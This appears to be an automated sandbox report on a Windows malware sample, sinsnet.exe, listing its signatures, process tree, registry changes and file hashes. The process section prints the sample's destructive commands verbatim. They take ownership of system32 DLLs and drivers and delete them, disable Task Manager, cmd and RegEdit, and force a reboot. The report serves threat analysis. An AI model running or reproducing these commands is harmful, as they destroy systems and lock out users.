Malware Analysis Report

2024-11-16 12:47

Sample ID 240806-l346xawfkp
Target sinsnet.exe
SHA256 aa4f0ac95d9dafa33ccd20a7d94d4387bf4ac89132077905480dfcadbef861e8
Tags
discovery evasion exploit
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

aa4f0ac95d9dafa33ccd20a7d94d4387bf4ac89132077905480dfcadbef861e8

Threat Level: Likely malicious

The file sinsnet.exe was found to be: Likely malicious.

Malicious Activity Summary

discovery evasion exploit

Disables cmd.exe use via registry modification

Disables RegEdit via registry modification

Disables Task Manager via registry modification

Possible privilege escalation attempt

Checks computer location settings

Modifies file permissions

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Modifies registry key

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-06 10:04

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-06 10:04

Reported

2024-08-06 10:07

Platform

win10v2004-20240802-en

Max time kernel

147s

Max time network

147s

Command Line

"C:\Users\Admin\AppData\Local\Temp\sinsnet.exe"

Signatures

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Windows\System32\reg.exe N/A

Disables Task Manager via registry modification

evasion

Disables cmd.exe use via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1" C:\Windows\System32\reg.exe N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sinsnet.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\shutdown.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\shutdown.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 752 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\cmd.exe
PID 752 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\cmd.exe
PID 752 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\cmd.exe
PID 752 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\cmd.exe
PID 752 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 752 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 752 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 752 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 752 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 752 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 752 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 752 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 752 wrote to memory of 3432 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 752 wrote to memory of 3432 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 752 wrote to memory of 3660 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 752 wrote to memory of 3660 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 3668 wrote to memory of 4280 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 3668 wrote to memory of 4280 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 752 wrote to memory of 704 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 752 wrote to memory of 704 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 452 wrote to memory of 3384 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 452 wrote to memory of 3384 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 752 wrote to memory of 4532 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 752 wrote to memory of 4532 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 452 wrote to memory of 3672 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 452 wrote to memory of 3672 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 752 wrote to memory of 4796 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 752 wrote to memory of 4796 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 752 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 752 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 752 wrote to memory of 4084 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 752 wrote to memory of 4084 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 752 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 752 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 752 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 752 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 752 wrote to memory of 4604 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 752 wrote to memory of 4604 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 752 wrote to memory of 4252 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 752 wrote to memory of 4252 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 752 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 752 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 752 wrote to memory of 4696 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 752 wrote to memory of 4696 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 3668 wrote to memory of 3224 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 3668 wrote to memory of 3224 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 752 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 752 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 752 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 752 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 752 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 752 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 752 wrote to memory of 3720 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 752 wrote to memory of 3720 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 752 wrote to memory of 1300 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 752 wrote to memory of 1300 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 752 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 752 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 752 wrote to memory of 3256 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 752 wrote to memory of 3256 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 752 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 752 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 752 wrote to memory of 4644 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 752 wrote to memory of 4644 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe

Processes

C:\Users\Admin\AppData\Local\Temp\sinsnet.exe

"C:\Users\Admin\AppData\Local\Temp\sinsnet.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f c:\windows\system32\*.dll && icacls c:\windows\system32\*.dll /grant Everyone:(F) && del /s /q c:\windows\system32\*.dll && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f c:\windows\system32\drivers\* && icacls c:\windows\system32\drivers\* /grant Everyone:(F) && del /s /q c:\windows\system32\drivers\* && exit

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\*.dll

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\drivers\*

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\drivers\* /grant Everyone:(F)

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\*.dll /grant Everyone:(F)

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\shutdown.exe

"C:\Windows\System32\shutdown.exe" -r -t 0

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x4 /state0:0xa3962855 /state1:0x41c64e6d

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 84.162.74.23.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/752-0-0x00007FF673FE0000-0x00007FF674181000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\note.txt

MD5 78551eabd7131c45b744a0cf420d29f7
SHA1 0f6792d1f3339ab5ac7674ad46267049ec9eb2b7
SHA256 9904338a1a2758f5969ba2affe5c46beaac955b6c4b87c67d20063ef5e0602f8
SHA512 abee3d1cd3860afe799deaac6e2c45fb741504ff80eb9fc7f39705cd7a9d46f61cee13cea6e676a33ea566f9256e13fa62dac7156b376ff94a7ced742516c064

C:\Windows\Debug\WIA\wiatrace.log

MD5 6548a91a605f553d3b8991d01f8c237c
SHA1 0488eb7314794f73adf48b3c9c7b982f8d64d1fb
SHA256 86dd9bc70b82d1da4f43eb0b2138d7022ca6d6b3654557378ad5ac173fccfe9e
SHA512 141ceda907d88cc2af4ef2a1d0d264ed92082a2f71ffda033bb52f5ba1d3d253507418c7adab58211e1c27353e86dddbbb325ff54e96205ac764782cbab3fd53

memory/752-4-0x00007FF673FE0000-0x00007FF674181000-memory.dmp

C:\Windows\Debug\WIA\wiatrace.log

MD5 8d238b58b93ccec4932094d3e56daa7f
SHA1 007f28f9abb235bda30d4d98352392dc37f32a42
SHA256 8ec7c8cf80ba3607ae3b073beb92c933ab8daeb183e173b7f12273d36e6b1fdf
SHA512 c29fd50aee9d55ea01df254706a627bfedc93d51d2bb0ad2886d883738bacb29b23b8535d35e2287c0fb03d9e6dbb30d4df8b8a9340474680f564473ba1d447d

C:\Windows\Debug\WIA\wiatrace.log

MD5 91aaaa7ecb003bed76ddb3d26730ba99
SHA1 96b8a034c4d4f5cf50949a2aea3892971162dd4b
SHA256 1736479e503ae958bcea8d6560a96be3ee2f6ffc6867941ca74c634fd93cfebb
SHA512 5b42cce61be9d8dadab77cf59743ee2a866b28781f4781142739ebf4da72eef318a9d5238d0e0afeafdd6da976752ef12c63b595191a23e298154e02ae508d4d

C:\Windows\Debug\WIA\wiatrace.log

MD5 8985d7f36d606f1bb289f345a53956e4
SHA1 acf410f20cdb8b1333d5f35895d2896eb9f988ab
